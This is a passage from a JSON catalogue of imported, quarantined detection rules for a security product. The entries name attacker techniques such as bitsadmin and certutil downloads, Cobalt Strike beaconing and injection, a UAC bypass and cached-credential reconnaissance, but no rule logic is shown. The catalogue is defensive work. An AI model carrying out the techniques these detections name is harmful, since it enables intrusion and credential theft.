"rules/community/aws/cloudtrail/aws_unusual_number_of_failed_authentications_from_the_same_ip.yaral" } }, { "id": "chronicle-detection-rules-aws-user-creates-permanent-access-key", "type": "detection", "name": 
"aws_user_creates_permanent_access_key", "description": "aws_user_creates_permanent_access_key", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-user-creates-permanent-access-key.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_user_creates_permanent_access_key", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_user_creates_permanent_access_key.yaral" } }, { "id": "chronicle-detection-rules-backdoor-detection-on-sql-servers", "type": "detection", "name": "backdoor_detection_on_sql_servers", "description": "backdoor_detection_on_sql_servers", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/backdoor-detection-on-sql-servers.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "backdoor_detection_on_sql_servers", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": 
"rules/_deprecated/soc_prime_rules/threat_hunting/proxy/backdoor_detection_on_sql_servers.yaral" } }, { "id": "chronicle-detection-rules-backup-catalog-deleted", "type": "detection", "name": "backup_catalog_deleted", "description": "backup_catalog_deleted", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/backup-catalog-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "backup_catalog_deleted", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/backup_catalog_deleted.yaral" } }, { "id": "chronicle-detection-rules-base64-encoded-powershell-command-detected", "type": "detection", "name": "base64_encoded_powershell_command_detected", "description": "base64_encoded_powershell_command_detected", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/base64-encoded-powershell-command-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "base64_encoded_powershell_command_detected", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": 
"https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/base64_encoded_powershell_command_detected.yaral" } }, { "id": "chronicle-detection-rules-bazar-loader-detection-sysmon-detection", "type": "detection", "name": "bazar_loader_detection_sysmon_detection", "description": "bazar_loader_detection_sysmon_detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/bazar-loader-detection-sysmon-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "bazar_loader_detection_sysmon_detection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/bazar_loader_detection__sysmon_detection.yaral" } }, { "id": "chronicle-detection-rules-bcdedit-off-sysmon", "type": "detection", "name": "bcdedit_off_sysmon", "description": "bcdedit_off_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/bcdedit-off-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": 
"bcdedit_off_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/bcdedit_off__sysmon.yaral" } }, { "id": "chronicle-detection-rules-betabot-neurevt-sysmon", "type": "detection", "name": "betabot_neurevt_sysmon", "description": "betabot_neurevt_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/betabot-neurevt-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "betabot_neurevt_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/betabot__neurevt___sysmon.yaral" } }, { "id": "chronicle-detection-rules-bits-http-client-useragent-usage", "type": "detection", "name": "bits_http_client_useragent_usage", "description": "bits_http_client_useragent_usage", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/bits-http-client-useragent-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 
"chronicle/detection-rules", "source_id": "bits_http_client_useragent_usage", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/bits_http_client_user_agent_usage.yaral" } }, { "id": "chronicle-detection-rules-bitsadmin-download", "type": "detection", "name": "bitsadmin_download", "description": "bitsadmin_download", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/bitsadmin-download.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "bitsadmin_download", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/bitsadmin_download.yaral" } }, { "id": "chronicle-detection-rules-bitsadmin-download-sysmon", "type": "detection", "name": "bitsadmin_download_sysmon", "description": "bitsadmin_download_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/bitsadmin-download-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { 
"source": "chronicle/detection-rules", "source_id": "bitsadmin_download_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/bitsadmin_download__sysmon.yaral" } }, { "id": "chronicle-detection-rules-blackbyte-ransomware-registry", "type": "detection", "name": "blackbyte_ransomware_registry", "description": "blackbyte_ransomware_registry", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/blackbyte-ransomware-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "blackbyte_ransomware_registry", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/blackbyte_ransomware_registry.yaral" } }, { "id": "chronicle-detection-rules-burp-suite-scanner-and-burp-collaborator-detected-via-proxy", "type": "detection", "name": "burp_suite_scanner_and_burp_collaborator_detected_via_proxy", "description": "burp_suite_scanner_and_burp_collaborator_detected_via_proxy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 
"detections/chronicle-imports/_quarantine/burp-suite-scanner-and-burp-collaborator-detected-via-proxy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "burp_suite_scanner_and_burp_collaborator_detected_via_proxy", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/proxy/burp_suite_scanner_and_burp_collaborator_detected_via_proxy.yaral" } }, { "id": "chronicle-detection-rules-cactustorch-remote-thread-creation", "type": "detection", "name": "cactustorch_remote_thread_creation", "description": "cactustorch_remote_thread_creation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/cactustorch-remote-thread-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "cactustorch_remote_thread_creation", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/cactustorch_remote_thread_creation.yaral" } }, { "id": "chronicle-detection-rules-certutil-activity-via-proxy", "type": "detection", "name": "certutil_activity_via_proxy", "description": "certutil_activity_via_proxy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": 
"_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/certutil-activity-via-proxy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "certutil_activity_via_proxy", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/certutil_activity__via_proxy.yaral" } }, { "id": "chronicle-detection-rules-certutil-encode", "type": "detection", "name": "certutil_encode", "description": "certutil_encode", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/certutil-encode.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "certutil_encode", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/certutil_encode.yaral" } }, { "id": "chronicle-detection-rules-chafer-malware-url-pattern", "type": "detection", "name": "chafer_malware_url_pattern", "description": "chafer_malware_url_pattern", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", 
"mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/chafer-malware-url-pattern.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "chafer_malware_url_pattern", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/chafer_malware_url_pattern.yaral" } }, { "id": "chronicle-detection-rules-chrome-browser-safe-browsing-user-bypass", "type": "detection", "name": "chrome_browser_safe_browsing_user_bypass", "description": "chrome_browser_safe_browsing_user_bypass", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/chrome-browser-safe-browsing-user-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "chrome_browser_safe_browsing_user_bypass", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/chrome_browser_safe_browsing_user_bypass.yaral" } }, { "id": "chronicle-detection-rules-citrix-netscaler-attack-cve201919781", "type": "detection", "name": "citrix_netscaler_attack_cve201919781", "description": "citrix_netscaler_attack_cve201919781", 
"version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/citrix-netscaler-attack-cve201919781.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "citrix_netscaler_attack_cve201919781", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/proactive_exploit_detection/webserver/citrix_netscaler_attack_cve_2019_19781.yaral" } }, { "id": "chronicle-detection-rules-cmdexe-launching-a-browser", "type": "detection", "name": "cmdexe_launching_a_browser", "description": "cmdexe_launching_a_browser", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/cmdexe-launching-a-browser.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "cmdexe_launching_a_browser", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/cmd_exe_launching_a_browser.yaral" } }, { "id": "chronicle-detection-rules-cmdkey-cached-credentials-recon", 
"type": "detection", "name": "cmdkey_cached_credentials_recon", "description": "cmdkey_cached_credentials_recon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/cmdkey-cached-credentials-recon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "cmdkey_cached_credentials_recon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/cmdkey_cached_credentials_recon.yaral" } }, { "id": "chronicle-detection-rules-cmstp-uac-bypass-via-com-object-access", "type": "detection", "name": "cmstp_uac_bypass_via_com_object_access", "description": "cmstp_uac_bypass_via_com_object_access", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/cmstp-uac-bypass-via-com-object-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "cmstp_uac_bypass_via_com_object_access", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": 
"rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/cmstp_uac_bypass_via_com_object_access.yaral" } }, { "id": "chronicle-detection-rules-cmstpexe-execution-detector-sysmon-behavior", "type": "detection", "name": "cmstpexe_execution_detector_sysmon_behavior", "description": "cmstpexe_execution_detector_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/cmstpexe-execution-detector-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "cmstpexe_execution_detector_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/cmstp_exe_execution_detector__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-cobalt-strike-dns-beaconing", "type": "detection", "name": "cobalt_strike_dns_beaconing", "description": "cobalt_strike_dns_beaconing", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/cobalt-strike-dns-beaconing.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "cobalt_strike_dns_beaconing", 
"source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/dns/cobalt_strike_dns_beaconing.yaral" } }, { "id": "chronicle-detection-rules-cobaltstrike-malleable-ocsp-profile", "type": "detection", "name": "cobaltstrike_malleable_ocsp_profile", "description": "cobaltstrike_malleable_ocsp_profile", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/cobaltstrike-malleable-ocsp-profile.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "cobaltstrike_malleable_ocsp_profile", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/cobaltstrike_malleable__ocsp__profile.yaral" } }, { "id": "chronicle-detection-rules-cobaltstrike-malleable-onedrive-browsing-traffic-profile", "type": "detection", "name": "cobaltstrike_malleable_onedrive_browsing_traffic_profile", "description": "cobaltstrike_malleable_onedrive_browsing_traffic_profile", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/cobaltstrike-malleable-onedrive-browsing-traffic-profile.yaml", 
"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "cobaltstrike_malleable_onedrive_browsing_traffic_profile", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/cobaltstrike_malleable_onedrive_browsing_traffic_profile.yaral" } }, { "id": "chronicle-detection-rules-cobaltstrike-process-injection", "type": "detection", "name": "cobaltstrike_process_injection", "description": "cobaltstrike_process_injection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/cobaltstrike-process-injection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "cobaltstrike_process_injection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/cobaltstrike_process_injection.yaral" } }, { "id": "chronicle-detection-rules-code42-server-dll-search-order-hijack", "type": "detection", "name": "code42_server_dll_search_order_hijack", "description": "code42_server_dll_search_order_hijack", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, 
"source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/code42-server-dll-search-order-hijack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "code42_server_dll_search_order_hijack", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/proactive_exploit_detection/sysmon/code42_server_dll_search_order_hijack.yaral" } }, { "id": "chronicle-detection-rules-combination-of-wevtutil-and-fsutil-to-avoid-forensics-analysis", "type": "detection", "name": "combination_of__wevtutil_and_fsutil_to_avoid_forensics_analysis", "description": "combination_of__wevtutil_and_fsutil_to_avoid_forensics_analysis", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/combination-of-wevtutil-and-fsutil-to-avoid-forensics-analysis.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "combination_of__wevtutil_and_fsutil_to_avoid_forensics_analysis", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/combination_of__wevtutil_and_fsutil_to_avoid_forensics_analysis.yaral" } }, { "id": 
"chronicle-detection-rules-compiled-html-file-detector-sysmon-behavior", "type": "detection", "name": "compiled_html_file_detector_sysmon_behavior", "description": "compiled_html_file_detector_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/compiled-html-file-detector-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "compiled_html_file_detector_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/compiled_html_file_detector__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-control-panel-item-execution-detector-sysmon-behavior", "type": "detection", "name": "control_panel_item_execution_detector_sysmon_behavior", "description": "control_panel_item_execution_detector_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/control-panel-item-execution-detector-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "control_panel_item_execution_detector_sysmon_behavior", 
"source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/control_panel_item_execution_detector__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-convertto-securestring-cmdlet-usage-via-commandline", "type": "detection", "name": "convertto_securestring_cmdlet_usage_via_commandline", "description": "convertto_securestring_cmdlet_usage_via_commandline", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/convertto-securestring-cmdlet-usage-via-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "convertto_securestring_cmdlet_usage_via_commandline", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/convertto_securestring_cmdlet_usage_via_commandline.yaral" } }, { "id": "chronicle-detection-rules-copy-from-or-to-admin-share-or-sysvol-folder", "type": "detection", "name": "copy_from_or_to_admin_share_or_sysvol_folder", "description": "copy_from_or_to_admin_share_or_sysvol_folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 
"detections/chronicle-imports/_quarantine/copy-from-or-to-admin-share-or-sysvol-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "copy_from_or_to_admin_share_or_sysvol_folder", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/copy_from_or_to_admin_share_or_sysvol_folder.yaral" } }, { "id": "chronicle-detection-rules-covid19-phishing-campaign-fake-world-health-organization", "type": "detection", "name": "covid19_phishing_campaign_fake_world_health_organization", "description": "covid19_phishing_campaign_fake_world_health_organization", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/covid19-phishing-campaign-fake-world-health-organization.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "covid19_phishing_campaign_fake_world_health_organization", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": 